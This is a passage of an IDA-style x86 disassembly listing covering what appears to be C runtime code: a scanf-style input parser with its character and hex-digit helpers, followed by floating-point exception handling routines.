sub_420510+10Ej ... cmp [ebp+var_F], 0 jz loc_4205D7 cmp [ebp+var_E], 0 mov [ebp+arg_4], esi jnz short loc_4206A3 mov eax, [ebp+arg_8] mov [ebp+var_44], eax add eax, 4 mov [ebp+arg_8], eax mov eax, [eax-4] mov [ebp+var_2C], eax loc_4206A3: ; CODE XREF: sub_420510+17Fj and [ebp+var_F], 0 cmp [ebp+var_5], 0 jnz short loc_4206C1 mov al, [esi] cmp al, 53h jz short loc_4206BD cmp al, 43h jz short loc_4206BD or [ebp+var_5], 0FFh jmp short loc_4206C1 ; --------------------------------------------------------------------------- loc_4206BD: ; CODE XREF: sub_420510+1A1j ; sub_420510+1A5j mov [ebp+var_5], 1 loc_4206C1: ; CODE XREF: sub_420510+19Bj ; sub_420510+1ABj mov ebx, [ebp+arg_4] movzx esi, byte ptr [ebx] or esi, 20h cmp esi, 6Eh mov [ebp+var_3C], esi jz short loc_4206FA cmp esi, 63h jz short loc_4206EB cmp esi, 7Bh jz short loc_4206EB push [ebp+arg_0] lea eax, [ebp+var_4] push eax call sub_420F9D pop ecx jmp short loc_4206F6 ; --------------------------------------------------------------------------- loc_4206EB: ; CODE XREF: sub_420510+1C5j ; sub_420510+1CAj push [ebp+arg_0] inc [ebp+var_4] call sub_420F6C loc_4206F6: ; CODE XREF: sub_420510+1D9j pop ecx mov [ebp+var_14], eax loc_4206FA: ; CODE XREF: sub_420510+1C0j xor eax, eax cmp [ebp+var_20], eax jz short loc_42070A cmp [ebp+var_C], eax jz loc_420EE6 loc_42070A: ; CODE XREF: sub_420510+1EFj cmp esi, 6Fh jg loc_420971 jz loc_420C23 cmp esi, 63h jz loc_42094E cmp esi, 64h jz loc_420C23 jle loc_42099B cmp esi, 67h jle short loc_42076E cmp esi, 69h jz short loc_420756 cmp esi, 6Eh jnz loc_42099B cmp [ebp+var_E], 0 mov edi, [ebp+var_4] jz loc_420E51 jmp loc_420E77 ; --------------------------------------------------------------------------- loc_420756: ; CODE XREF: sub_420510+229j push 64h pop esi loc_420759: ; CODE XREF: sub_420510+480j mov ebx, [ebp+var_14] cmp ebx, 2Dh jnz loc_4209E3 mov [ebp+var_17], 1 jmp loc_4209E8 ; --------------------------------------------------------------------------- loc_42076E: ; CODE XREF: sub_420510+224j mov ebx, [ebp+var_14] lea esi, [ebp+var_1C4] cmp ebx, 2Dh jnz short loc_42078A mov [ebp+var_1C4], bl lea esi, [ebp+var_1C3] jmp short loc_42078F ; --------------------------------------------------------------------------- loc_42078A: ; CODE XREF: sub_420510+26Aj cmp ebx, 2Bh jnz short loc_4207A6 loc_42078F: ; CODE XREF: sub_420510+278j mov edi, [ebp+arg_0] dec [ebp+var_C] inc [ebp+var_4] push edi call sub_420F6C mov ebx, eax pop ecx mov [ebp+var_14], ebx jmp short loc_4207A9 ; --------------------------------------------------------------------------- loc_4207A6: ; CODE XREF: sub_420510+27Dj mov edi, [ebp+arg_0] loc_4207A9: ; CODE XREF: sub_420510+294j cmp [ebp+var_20], 0 jz short loc_4207B8 cmp [ebp+var_C], 15Dh jle short loc_4207BF loc_4207B8: ; CODE XREF: sub_420510+29Dj mov [ebp+var_C], 15Dh loc_4207BF: ; CODE XREF: sub_420510+2A6j ; sub_420510+2F2j cmp dword_43CBE4, 1 jle short loc_4207D4 push 4 push ebx call sub_41F515 pop ecx pop ecx jmp short loc_4207DF ; --------------------------------------------------------------------------- loc_4207D4: ; CODE XREF: sub_420510+2B6j mov eax, off_43C9D8 mov al, [eax+ebx*2] and eax, 4 loc_4207DF: ; CODE XREF: sub_420510+2C2j test eax, eax jz short loc_420804 mov eax, [ebp+var_C] dec [ebp+var_C] test eax, eax jz short loc_420804 inc [ebp+var_1C] mov [esi], bl inc esi inc [ebp+var_4] push edi call sub_420F6C mov ebx, eax pop ecx mov [ebp+var_14], ebx jmp short loc_4207BF ; --------------------------------------------------------------------------- loc_420804: ; CODE XREF: sub_420510+2D1j ; sub_420510+2DBj cmp byte_43CBE8, bl jnz short loc_420872 mov eax, [ebp+var_C] dec [ebp+var_C] test eax, eax jz short loc_420872 inc [ebp+var_4] push edi call sub_420F6C mov ebx, eax mov al, byte_43CBE8 mov [esi], al pop ecx mov [ebp+var_14], ebx inc esi loc_42082D: ; CODE XREF: sub_420510+360j cmp dword_43CBE4, 1 jle short loc_420842 push 4 push ebx call sub_41F515 pop ecx pop ecx jmp short loc_42084D ; --------------------------------------------------------------------------- loc_420842: ; CODE XREF: sub_420510+324j mov eax, off_43C9D8 mov al, [eax+ebx*2] and eax, 4 loc_42084D: ; CODE XREF: sub_420510+330j test eax, eax jz short loc_420872 mov eax, [ebp+var_C] dec [ebp+var_C] test eax, eax jz short loc_420872 inc [ebp+var_1C] mov [esi], bl inc esi inc [ebp+var_4] push edi call sub_420F6C mov ebx, eax pop ecx mov [ebp+var_14], ebx jmp short loc_42082D ; --------------------------------------------------------------------------- loc_420872: ; CODE XREF: sub_420510+2FAj ; sub_420510+304j ... cmp [ebp+var_1C], 0 jz loc_42090A cmp ebx, 65h jz short loc_42088A cmp ebx, 45h jnz loc_42090A loc_42088A: ; CODE XREF: sub_420510+36Fj mov eax, [ebp+var_C] dec [ebp+var_C] test eax, eax jz short loc_42090A mov byte ptr [esi], 65h inc esi inc [ebp+var_4] push edi call sub_420F6C mov ebx, eax pop ecx cmp ebx, 2Dh mov [ebp+var_14], ebx jnz short loc_4208B1 mov [esi], al inc esi jmp short loc_4208B6 ; --------------------------------------------------------------------------- loc_4208B1: ; CODE XREF: sub_420510+39Aj cmp ebx, 2Bh jnz short loc_4208D4 loc_4208B6: ; CODE XREF: sub_420510+39Fj mov eax, [ebp+var_C] dec [ebp+var_C] test eax, eax jnz short loc_4208C5 and [ebp+var_C], eax jmp short loc_4208D4 ; --------------------------------------------------------------------------- loc_4208C5: ; CODE XREF: sub_420510+3AEj ; sub_420510+3F8j inc [ebp+var_4] push edi call sub_420F6C mov ebx, eax pop ecx mov [ebp+var_14], ebx loc_4208D4: ; CODE XREF: sub_420510+3A4j ; sub_420510+3B3j cmp dword_43CBE4, 1 jle short loc_4208E9 push 4 push ebx call sub_41F515 pop ecx pop ecx jmp short loc_4208F4 ; --------------------------------------------------------------------------- loc_4208E9: ; CODE XREF: sub_420510+3CBj mov eax, off_43C9D8 mov al, [eax+ebx*2] and eax, 4 loc_4208F4: ; CODE XREF: sub_420510+3D7j test eax, eax jz short loc_42090A mov eax, [ebp+var_C] dec [ebp+var_C] test eax, eax jz short loc_42090A inc [ebp+var_1C] mov [esi], bl inc esi jmp short loc_4208C5 ; --------------------------------------------------------------------------- loc_42090A: ; CODE XREF: sub_420510+366j ; sub_420510+374j ... dec [ebp+var_4] push edi push ebx call sub_420F86 cmp [ebp+var_1C], 0 pop ecx pop ecx jz loc_420F16 cmp [ebp+var_E], 0 jnz loc_420E77 inc [ebp+var_34] and byte ptr [esi], 0 lea eax, [ebp+var_1C4] push eax movsx eax, [ebp+var_D] push [ebp+var_2C] dec eax push eax call off_43CF88 add esp, 0Ch jmp loc_420E77 ; --------------------------------------------------------------------------- loc_42094E: ; CODE XREF: sub_420510+20Cj cmp [ebp+var_20], eax jnz short loc_42095D inc [ebp+var_C] mov [ebp+var_20], 1 loc_42095D: ; CODE XREF: sub_420510+441j cmp [ebp+var_5], 0 jle short loc_420967 mov [ebp+var_16], 1 loc_420967: ; CODE XREF: sub_420510+451j mov edi, offset dword_43CE60 jmp loc_420A7C ; --------------------------------------------------------------------------- loc_420971: ; CODE XREF: sub_420510+1FDj mov eax, esi sub eax, 70h jz loc_420C1F sub eax, 3 jz loc_420A6D dec eax dec eax jz loc_420C23 sub eax, 3 jz loc_420759 sub eax, 3 jz short loc_4209BF loc_42099B: ; CODE XREF: sub_420510+21Bj ; sub_420510+22Ej movzx eax, byte ptr [ebx] cmp eax, [ebp+var_14] jnz loc_420EE6 dec [ebp+var_15] cmp [ebp+var_E], 0 jnz loc_420E77 mov eax, [ebp+var_44] mov [ebp+arg_8], eax jmp loc_420E77 ; --------------------------------------------------------------------------- loc_4209BF: ; CODE XREF: sub_420510+489j cmp [ebp+var_5], 0 jle short loc_4209C9 mov [ebp+var_16], 1 loc_4209C9: ; CODE XREF: sub_420510+4B3j mov edi, [ebp+arg_4] inc edi mov [ebp+arg_4], edi cmp byte ptr [edi], 5Eh jnz loc_420A80 mov eax, edi lea edi, [eax+1] jmp loc_420A7C ; --------------------------------------------------------------------------- loc_4209E3: ; CODE XREF: sub_420510+24Fj cmp ebx, 2Bh jnz short loc_420A0A loc_4209E8: ; CODE XREF: sub_420510+259j dec [ebp+var_C] jnz short loc_4209F9 cmp [ebp+var_20], 0 jz short loc_4209F9 mov [ebp+var_F], 1 jmp short loc_420A0A ; --------------------------------------------------------------------------- loc_4209F9: ; CODE XREF: sub_420510+4DBj ; sub_420510+4E1j push [ebp+arg_0] inc [ebp+var_4] call sub_420F6C mov ebx, eax pop ecx mov [ebp+var_14], ebx loc_420A0A: ; CODE XREF: sub_420510+4D6j ; sub_420510+4E7j cmp ebx, 30h jnz loc_420C58 push [ebp+arg_0] inc [ebp+var_4] call sub_420F6C mov ebx, eax pop ecx cmp bl, 78h mov [ebp+var_14], ebx jz short loc_420A58 cmp bl, 58h jz short loc_420A58 cmp esi, 78h mov [ebp+var_1C], 1 jz short loc_420A42 push 6Fh loc_420A3C: ; CODE XREF: sub_420510+55Bj pop esi jmp loc_420C58 ; --------------------------------------------------------------------------- loc_420A42: ; CODE XREF: sub_420510+528j push [ebp+arg_0] dec [ebp+var_4] push ebx call sub_420F86 pop ecx pop ecx push 30h pop ebx jmp loc_420C55 ; --------------------------------------------------------------------------- loc_420A58: ; CODE XREF: sub_420510+517j ; sub_420510+51Cj push [ebp+arg_0] inc [ebp+var_4] call sub_420F6C pop ecx mov ebx, eax mov [ebp+var_14], ebx push 78h jmp short loc_420A3C ; --------------------------------------------------------------------------- loc_420A6D: ; CODE XREF: sub_420510+46Fj cmp [ebp+var_5], 0 jle short loc_420A77 mov [ebp+var_16], 1 loc_420A77: ; CODE XREF: sub_420510+561j mov edi, offset dword_43CE58 loc_420A7C: ; CODE XREF: sub_420510+45Cj ; sub_420510+4CEj or [ebp+var_18], 0FFh loc_420A80: ; CODE XREF: sub_420510+4C3j push 20h lea eax, [ebp+var_64] push 0 push eax call sub_41B590 add esp, 0Ch cmp [ebp+var_3C], 7Bh jnz short loc_420AA4 cmp byte ptr [edi], 5Dh jnz short loc_420AA4 mov dl, 5Dh inc edi mov [ebp+var_59], 20h jmp short loc_420AA7 ; --------------------------------------------------------------------------- loc_420AA4: ; CODE XREF: sub_420510+584j ; sub_420510+589j mov dl, [ebp+var_35] loc_420AA7: ; CODE XREF: sub_420510+592j ; sub_420510+5E1j ... mov al, [edi] cmp al, 5Dh jz short loc_420B0C inc edi cmp al, 2Dh jnz short loc_420AF3 test dl, dl jz short loc_420AF3 mov cl, [edi] cmp cl, 5Dh jz short loc_420AF3 inc edi cmp dl, cl jnb short loc_420AC6 mov al, cl jmp short loc_420ACA ; --------------------------------------------------------------------------- loc_420AC6: ; CODE XREF: sub_420510+5B0j mov al, dl mov dl, cl loc_420ACA: ; CODE XREF: sub_420510+5B4j cmp dl, al ja short loc_420AEF movzx edx, dl movzx esi, al sub esi, edx inc esi loc_420AD7: ; CODE XREF: sub_420510+5DDj mov ecx, edx mov eax, edx and ecx, 7 mov bl, 1 shr eax, 3 shl bl, cl lea eax, [ebp+eax+var_64] or [eax], bl inc edx dec esi jnz short loc_420AD7 loc_420AEF: ; CODE XREF: sub_420510+5BCj xor dl, dl jmp short loc_420AA7 ; --------------------------------------------------------------------------- loc_420AF3: ; CODE XREF: sub_420510+5A0j ; sub_420510+5A4j ... movzx ecx, al mov dl, al mov eax, ecx and ecx, 7 mov bl, 1 shr eax, 3 shl bl, cl lea eax, [ebp+eax+var_64] or [eax], bl jmp short loc_420AA7 ; --------------------------------------------------------------------------- loc_420B0C: ; CODE XREF: sub_420510+59Bj cmp byte ptr [edi], 0 jz loc_420F16 cmp [ebp+var_3C], 7Bh jnz short loc_420B1E mov [ebp+arg_4], edi loc_420B1E: ; CODE XREF: sub_420510+609j mov edi, [ebp+arg_0] mov esi, [ebp+var_2C] dec [ebp+var_4] push edi push [ebp+var_14] mov [ebp+var_30], esi call sub_420F86 pop ecx pop ecx loc_420B35: ; CODE XREF: sub_420510+6BCj ; sub_420510+6C4j cmp [ebp+var_20], 0 jz short loc_420B49 mov eax, [ebp+var_C] dec [ebp+var_C] test eax, eax jz loc_420BE5 loc_420B49: ; CODE XREF: sub_420510+629j inc [ebp+var_4] push edi call sub_420F6C cmp eax, 0FFFFFFFFh pop ecx mov [ebp+var_14], eax jz short loc_420BD9 mov ecx, eax push 1 and ecx, 7 pop edx movsx ebx, [ebp+var_18] shl edx, cl mov ecx, eax sar ecx, 3 movsx ecx, [ebp+ecx+var_64] xor ecx, ebx test edx, ecx jz short loc_420BD9 cmp [ebp+var_E], 0 jnz short loc_420BD1 cmp [ebp+var_16], 0 jz short loc_420BC6 mov ecx, off_43C9D8 mov [ebp+var_38], al movzx eax, al test byte ptr [ecx+eax*2+1], 80h jz short loc_420BA5 inc [ebp+var_4] push edi call sub_420F6C pop ecx mov [ebp+var_37], al loc_420BA5: ; CODE XREF: sub_420510+686j push dword_43CBE4 lea eax, [ebp+var_38] push eax lea eax, [ebp+var_3E] push eax call sub_423EC3 mov ax, [ebp+var_3E] add esp, 0Ch mov [esi], ax inc esi inc esi jmp short loc_420BC9 ; --------------------------------------------------------------------------- loc_420BC6: ; CODE XREF: sub_420510+673j mov [esi], al inc esi loc_420BC9: ; CODE XREF: sub_420510+6B4j mov [ebp+var_2C], esi jmp loc_420B35 ; --------------------------------------------------------------------------- loc_420BD1: ; CODE XREF: sub_420510+66Dj inc [ebp+var_30] jmp loc_420B35 ; --------------------------------------------------------------------------- loc_420BD9: ; CODE XREF: sub_420510+649j ; sub_420510+667j dec [ebp+var_4] push edi push eax call sub_420F86 pop ecx pop ecx loc_420BE5: ; CODE XREF: sub_420510+633j cmp [ebp+var_30], esi jz loc_420F16 cmp [ebp+var_E], 0 jnz loc_420E77 inc [ebp+var_34] cmp [ebp+var_3C], 63h jz loc_420E77 cmp [ebp+var_16], 0 mov eax, [ebp+var_2C] jz short loc_420C17 and word ptr [eax], 0 jmp loc_420E77 ; --------------------------------------------------------------------------- loc_420C17: ; CODE XREF: sub_420510+6FCj and byte ptr [eax], 0 jmp loc_420E77 ; --------------------------------------------------------------------------- loc_420C1F: ; CODE XREF: sub_420510+466j mov [ebp+var_D], 1 loc_420C23: ; CODE XREF: sub_420510+203j ; sub_420510+215j ... mov ebx, [ebp+var_14] cmp ebx, 2Dh jnz short loc_420C31 mov [ebp+var_17], 1 jmp short loc_420C36 ; --------------------------------------------------------------------------- loc_420C31: ; CODE XREF: sub_420510+719j cmp ebx, 2Bh jnz short loc_420C58 loc_420C36: ; CODE XREF: sub_420510+71Fj dec [ebp+var_C] jnz short loc_420C47 cmp [ebp+var_20], 0 jz short loc_420C47 mov [ebp+var_F], 1 jmp short loc_420C58 ; --------------------------------------------------------------------------- loc_420C47: ; CODE XREF: sub_420510+729j ; sub_420510+72Fj push [ebp+arg_0] inc [ebp+var_4] call sub_420F6C pop ecx mov ebx, eax loc_420C55: ; CODE XREF: sub_420510+543j mov [ebp+var_14], ebx loc_420C58: ; CODE XREF: sub_420510+4FDj ; sub_420510+52Dj ... cmp [ebp+var_30], 0 jz loc_420D71 cmp [ebp+var_F], 0 jnz loc_420D4F loc_420C6C: ; CODE XREF: sub_420510+82Cj cmp esi, 78h jnz short loc_420CC0 cmp dword_43CBE4, 1 jle short loc_420C89 push 80h push ebx call sub_41F515 pop ecx pop ecx jmp short loc_420C96 ; --------------------------------------------------------------------------- loc_420C89: ; CODE XREF: sub_420510+768j mov eax, off_43C9D8 mov al, [eax+ebx*2] and eax, 80h loc_420C96: ; CODE XREF: sub_420510+777j test eax, eax jz loc_420D41 mov eax, [ebp+var_28] mov edx, [ebp+var_24] push 4 pop ecx call sub_423F90 push ebx mov [ebp+var_28], eax mov [ebp+var_24], edx call sub_420F35 mov ebx, eax pop ecx mov [ebp+var_14], ebx jmp short loc_420D13 ; --------------------------------------------------------------------------- loc_420CC0: ; CODE XREF: sub_420510+75Fj cmp dword_43CBE4, 1 jle short loc_420CD5 push 4 push ebx call sub_41F515 pop ecx pop ecx jmp short loc_420CE0 ; --------------------------------------------------------------------------- loc_420CD5: ; CODE XREF: sub_420510+7B7j mov eax, off_43C9D8 mov al, [eax+ebx*2] and eax, 4 loc_420CE0: ; CODE XREF: sub_420510+7C3j test eax, eax jz short loc_420D41 cmp esi, 6Fh jnz short loc_420CFE cmp ebx, 38h jge short loc_420D41 mov eax, [ebp+var_28] mov edx, [ebp+var_24] push 3 pop ecx call sub_423F90 jmp short loc_420D0D ; --------------------------------------------------------------------------- loc_420CFE: ; CODE XREF: sub_420510+7D7j push 0 push 0Ah push [ebp+var_24] push [ebp+var_28] call sub_41D280 loc_420D0D: ; CODE XREF: sub_420510+7ECj mov [ebp+var_28], eax mov [ebp+var_24], edx loc_420D13: ; CODE XREF: sub_420510+7AEj inc [ebp+var_1C] lea eax, [ebx-30h] cdq add [ebp+var_28], eax adc [ebp+var_24], edx cmp [ebp+var_20], 0 jz short loc_420D2B dec [ebp+var_C] jz short loc_420D4F loc_420D2B: ; CODE XREF: sub_420510+814j push [ebp+arg_0] inc [ebp+var_4] call sub_420F6C mov ebx, eax pop ecx mov [ebp+var_14], ebx jmp loc_420C6C ; --------------------------------------------------------------------------- loc_420D41: ; CODE XREF: sub_420510+788j ; sub_420510+7D2j ... push [ebp+arg_0] dec [ebp+var_4] push ebx call sub_420F86 pop ecx pop ecx loc_420D4F: ; CODE XREF: sub_420510+756j ; sub_420510+819j cmp [ebp+var_17], 0 jz loc_420E35 mov eax, [ebp+var_28] mov ecx, [ebp+var_24] neg eax adc ecx, 0 mov [ebp+var_28], eax neg ecx mov [ebp+var_24], ecx jmp loc_420E35 ; --------------------------------------------------------------------------- loc_420D71: ; CODE XREF: sub_420510+74Cj cmp [ebp+var_F], 0 jnz loc_420E2D loc_420D7B: ; CODE XREF: sub_420510+90Aj cmp esi, 78h jz short loc_420DBF cmp esi, 70h jz short loc_420DBF cmp dword_43CBE4, 1 jle short loc_420D9A push 4 push ebx call sub_41F515 pop ecx pop ecx jmp short loc_420DA5 ; --------------------------------------------------------------------------- loc_420D9A: ; CODE XREF: sub_420510+87Cj mov eax, off_43C9D8 mov al, [eax+ebx*2] and eax, 4 loc_420DA5: ; CODE XREF: sub_420510+888j test eax, eax jz short loc_420E1F cmp esi, 6Fh jnz short loc_420DB8 cmp ebx, 38h jge short loc_420E1F shl edi, 3 jmp short loc_420DF7 ; --------------------------------------------------------------------------- loc_420DB8: ; CODE XREF: sub_420510+89Cj lea edi, [edi+edi*4] shl edi, 1 jmp short loc_420DF7 ; --------------------------------------------------------------------------- loc_420DBF: ; CODE XREF: sub_420510+86Ej ; sub_420510+873j cmp dword_43CBE4, 1 jle short loc_420DD7 push 80h push ebx call sub_41F515 pop ecx pop ecx jmp short loc_420DE4 ; --------------------------------------------------------------------------- loc_420DD7: ; CODE XREF: sub_420510+8B6j mov eax, off_43C9D8 mov al, [eax+ebx*2] and eax, 80h loc_420DE4: ; CODE XREF: sub_420510+8C5j test eax, eax jz short loc_420E1F push ebx shl edi, 4 call sub_420F35 mov ebx, eax pop ecx mov [ebp+var_14], ebx loc_420DF7: ; CODE XREF: sub_420510+8A6j ; sub_420510+8ADj inc [ebp+var_1C] cmp [ebp+var_20], 0 lea edi, [edi+ebx-30h] jz short loc_420E09 dec [ebp+var_C] jz short loc_420E2D loc_420E09: ; CODE XREF: sub_420510+8F2j push [ebp+arg_0] inc [ebp+var_4] call sub_420F6C mov ebx, eax pop ecx mov [ebp+var_14], ebx jmp loc_420D7B ; --------------------------------------------------------------------------- loc_420E1F: ; CODE XREF: sub_420510+897j ; sub_420510+8A1j ... push [ebp+arg_0] dec [ebp+var_4] push ebx call sub_420F86 pop ecx pop ecx loc_420E2D: ; CODE XREF: sub_420510+865j ; sub_420510+8F7j cmp [ebp+var_17], 0 jz short loc_420E35 neg edi loc_420E35: ; CODE XREF: sub_420510+843j ; sub_420510+85Cj ... cmp esi, 46h jnz short loc_420E3E and [ebp+var_1C], 0 loc_420E3E: ; CODE XREF: sub_420510+928j cmp [ebp+var_1C], 0 jz loc_420F16 cmp [ebp+var_E], 0 jnz short loc_420E77 inc [ebp+var_34] loc_420E51: ; CODE XREF: sub_420510+23Bj cmp [ebp+var_30], 0 jz short loc_420E67 mov eax, [ebp+var_2C] mov ecx, [ebp+var_28] mov [eax], ecx mov ecx, [ebp+var_24] mov [eax+4], ecx jmp short loc_420E77 ; --------------------------------------------------------------------------- loc_420E67: ; CODE XREF: sub_420510+945j cmp [ebp+var_D], 0 mov eax, [ebp+var_2C] jz short loc_420E74 mov [eax], edi jmp short loc_420E77 ; --------------------------------------------------------------------------- loc_420E74: ; CODE XREF: sub_420510+95Ej mov [eax], di loc_420E77: ; CODE XREF: sub_420510+241j ; sub_420510+414j ... inc [ebp+var_15] inc [ebp+arg_4] mov esi, [ebp+arg_4] jmp short loc_420EC4 ; --------------------------------------------------------------------------- loc_420E82: ; CODE XREF: sub_420510+93j inc [ebp+var_4] push edi call sub_420F6C mov ebx, eax pop ecx movzx eax, byte ptr [esi] inc esi cmp eax, ebx mov [ebp+var_14], ebx mov [ebp+arg_4], esi jnz short loc_420EF1 mov ecx, off_43C9D8 movzx eax, bl test byte ptr [ecx+eax*2+1], 80h jz short loc_420EC4 inc [ebp+var_4] push edi call sub_420F6C pop ecx movzx ecx, byte ptr [esi] inc esi cmp ecx, eax mov [ebp+arg_4], esi jnz short loc_420EFF dec [ebp+var_4] loc_420EC4: ; CODE XREF: sub_420510+970j ; sub_420510+99Aj cmp [ebp+var_14], 0FFFFFFFFh jnz short loc_420EDA cmp byte ptr [esi], 25h jnz short loc_420F1C mov eax, [ebp+arg_4] cmp byte ptr [eax+1], 6Eh jnz short loc_420F1C mov esi, eax loc_420EDA: ; CODE XREF: sub_420510+9B8j mov al, [esi] test al, al jnz loc_42053A jmp short loc_420F16 ; --------------------------------------------------------------------------- loc_420EE6: ; CODE XREF: sub_420510+1F4j ; sub_420510+491j push [ebp+arg_0] dec [ebp+var_4] push [ebp+var_14] jmp short loc_420EF6 ; --------------------------------------------------------------------------- loc_420EF1: ; CODE XREF: sub_420510+98Aj dec [ebp+var_4] push edi push ebx loc_420EF6: ; CODE XREF: sub_420510+9DFj call sub_420F86 pop ecx pop ecx jmp short loc_420F16 ; --------------------------------------------------------------------------- loc_420EFF: ; CODE XREF: sub_420510+9AFj dec [ebp+var_4] push edi push eax call sub_420F86 dec [ebp+var_4] push edi push ebx call sub_420F86 add esp, 10h loc_420F16: ; CODE XREF: sub_420510+1Fj ; sub_420510+40Aj ... cmp [ebp+var_14], 0FFFFFFFFh jnz short loc_420F2D loc_420F1C: ; CODE XREF: sub_420510+9BDj ; sub_420510+9C6j mov eax, [ebp+var_34] test eax, eax jnz short loc_420F30 cmp [ebp+var_15], al jnz short loc_420F30 or eax, 0FFFFFFFFh jmp short loc_420F30 ; --------------------------------------------------------------------------- loc_420F2D: ; CODE XREF: sub_420510+A0Aj mov eax, [ebp+var_34] loc_420F30: ; CODE XREF: sub_420510+A11j ; sub_420510+A16j ... pop edi pop esi pop ebx leave retn sub_420510 endp ; =============== S U B R O U T I N E ======================================= sub_420F35 proc near ; CODE XREF: sub_420510+7A3p ; sub_420510+8DCp arg_0 = dword ptr 4 cmp dword_43CBE4, 1 push esi jle short loc_420F4F mov esi, [esp+4+arg_0] push 4 push esi call sub_41F515 pop ecx pop ecx jmp short loc_420F5E ; --------------------------------------------------------------------------- loc_420F4F: ; CODE XREF: sub_420F35+8j mov esi, [esp+4+arg_0] mov eax, off_43C9D8 mov al, [eax+esi*2] and eax, 4 loc_420F5E: ; CODE XREF: sub_420F35+18j test eax, eax jnz short loc_420F68 and esi, 0FFFFFFDFh sub esi, 7 loc_420F68: ; CODE XREF: sub_420F35+2Bj mov eax, esi pop esi retn sub_420F35 endp ; =============== S U B R O U T I N E ======================================= sub_420F6C proc near ; CODE XREF: sub_420510+1E1p ; sub_420510+289p ... arg_0 = dword ptr 4 mov edx, [esp+arg_0] dec dword ptr [edx+4] js short loc_420F7E mov ecx, [edx] movzx eax, byte ptr [ecx] inc ecx mov [edx], ecx retn ; --------------------------------------------------------------------------- loc_420F7E: ; CODE XREF: sub_420F6C+7j push edx call sub_41F043 pop ecx retn sub_420F6C endp ; =============== S U B R O U T I N E ======================================= sub_420F86 proc near ; CODE XREF: sub_420510+6Bp ; sub_420510+3FFp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 cmp [esp+arg_0], 0FFFFFFFFh jz short locret_420F9C push [esp+arg_4] push [esp+4+arg_0] call sub_423FAF pop ecx pop ecx locret_420F9C: ; CODE XREF: sub_420F86+5j retn sub_420F86 endp ; =============== S U B R O U T I N E ======================================= sub_420F9D proc near ; CODE XREF: sub_420510+63p ; sub_420510+1D3p arg_0 = dword ptr 4 arg_4 = dword ptr 8 push esi mov esi, [esp+4+arg_0] push edi loc_420FA3: ; CODE XREF: sub_420F9D+1Dj push [esp+8+arg_4] inc dword ptr [esi] call sub_420F6C mov edi, eax push edi call sub_41D670 pop ecx test eax, eax pop ecx jnz short loc_420FA3 mov eax, edi pop edi pop esi retn sub_420F9D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame ; int __fastcall sub_420FC1(int,int,double,int) sub_420FC1 proc near ; CODE XREF: sub_41C679+51p ; sub_41C7BF+51p var_1C = qword ptr -1Ch var_14 = qword ptr -14h var_C = qword ptr -0Ch arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_C = dword ptr 14h push ebp mov ebp, esp cmp dword_43D350, 0 jnz short loc_420FF6 push [ebp+arg_C] ; int fld qword ptr [ebp+arg_4] push ecx push ecx ; double fstp [esp+0Ch+var_C] push ecx ; int push ecx ; int fldz fstp [esp+14h+var_14] fld qword ptr [ebp+arg_4] push ecx ; int push ecx ; int fstp [esp+1Ch+var_1C] push [ebp+arg_0] ; int push 1 ; int call sub_421576 add esp, 24h pop ebp retn ; --------------------------------------------------------------------------- loc_420FF6: ; CODE XREF: sub_420FC1+Aj push 0FFFFh mov ds:dword_4DB958, 21h push [ebp+arg_C] call sub_4217E9 fld qword ptr [ebp+arg_4] pop ecx pop ecx pop ebp retn sub_420FC1 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame ; int __cdecl sub_421014(int,int,double,double,int) sub_421014 proc near ; CODE XREF: sub_41C679:loc_41C73Cp ; sub_41C7BF:loc_41C882p var_74 = qword ptr -74h var_6C = qword ptr -6Ch var_64 = qword ptr -64h var_5C = dword ptr -5Ch var_58 = byte ptr -58h var_20 = dword ptr -20h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = qword ptr 10h arg_10 = qword ptr 18h arg_18 = dword ptr 20h push ebp mov ebp, esp sub esp, 58h push [ebp+arg_18] lea eax, [ebp+arg_10] push eax push [ebp+arg_0] call sub_42135F add esp, 0Ch test eax, eax jnz short loc_421052 lea eax, [ebp+arg_10] and [ebp+var_20], 0FFFFFFFEh push eax lea eax, [ebp+arg_8] push eax lea eax, [ebp+arg_18] push [ebp+arg_4] push [ebp+arg_0] push eax lea eax, [ebp+var_58] push eax call sub_4210AC add esp, 18h loc_421052: ; CODE XREF: sub_421014+1Aj push [ebp+arg_0] call sub_421649 cmp dword_43D350, 0 pop ecx jnz short loc_421090 test eax, eax jz short loc_421090 push [ebp+arg_18] ; int fld [ebp+arg_10] push ecx push ecx ; double fstp [esp+64h+var_64] push ecx ; int push ecx ; int fldz fstp [esp+6Ch+var_6C] fld [ebp+arg_8] push ecx ; int push ecx ; int fstp [esp+74h+var_74] push [ebp+arg_4] ; int push eax ; int call sub_421576 add esp, 24h leave retn ; --------------------------------------------------------------------------- loc_421090: ; CODE XREF: sub_421014+4Ej ; sub_421014+52j push eax call sub_4215FE mov [esp+5Ch+var_5C], 0FFFFh push [ebp+arg_18] call sub_4217E9 fld [ebp+arg_10] pop ecx pop ecx leave retn sub_421014 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4210AC proc near ; CODE XREF: sub_421014+36p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp mov ecx, [ebp+arg_0] xor eax, eax push ebx push esi mov [ecx+4], eax mov ecx, [ebp+arg_0] push edi push 1 mov [ecx+8], eax mov ecx, [ebp+arg_0] pop ebx mov [ecx+0Ch], eax mov cl, byte ptr [ebp+arg_8] test cl, 10h jz short loc_4210DE mov eax, [ebp+arg_0] mov [ebp+arg_8], 0C000008Fh or [eax+4], ebx loc_4210DE: ; CODE XREF: sub_4210AC+23j test cl, 2 jz short loc_4210F1 mov eax, [ebp+arg_0] mov [ebp+arg_8], 0C0000093h or dword ptr [eax+4], 2 loc_4210F1: ; CODE XREF: sub_4210AC+35j test cl, bl jz short loc_421103 mov eax, [ebp+arg_0] mov [ebp+arg_8], 0C0000091h or dword ptr [eax+4], 4 loc_421103: ; CODE XREF: sub_4210AC+47j test cl, 4 jz short loc_421116 mov eax, [ebp+arg_0] mov [ebp+arg_8], 0C000008Eh or dword ptr [eax+4], 8 loc_421116: ; CODE XREF: sub_4210AC+5Aj test cl, 8 jz short loc_421129 mov eax, [ebp+arg_0] mov [ebp+arg_8], 0C0000090h or dword ptr 